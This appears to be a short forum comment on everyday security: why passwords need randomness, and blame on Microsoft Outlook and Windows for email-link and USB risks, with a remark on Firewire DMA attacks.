Because the nature of a password requires it to be random. Passphrases are easier to remember, but they still need to be random ("I love you" is not a good passphrase). What is needed is a completely different approach, and people have been working on that for years. So far, all they've come up with is "your thumb print has expired. Please enter a new thumb print".
> Why can't they click on links in emails with wild abandon?
Microsoft Outlook.
> Why can't they plug a USB stick into a computer without facing a myriad of viruses?
Microsoft Windows.
Blame Microsoft for two out of three. That's pretty much where security stands in general. Note, however, that if you had said Firewire instead of USB, it would have been a lot worse. Firewire does DMA (direct memory access), so the OS doesn't matter (but an IOMMU might help).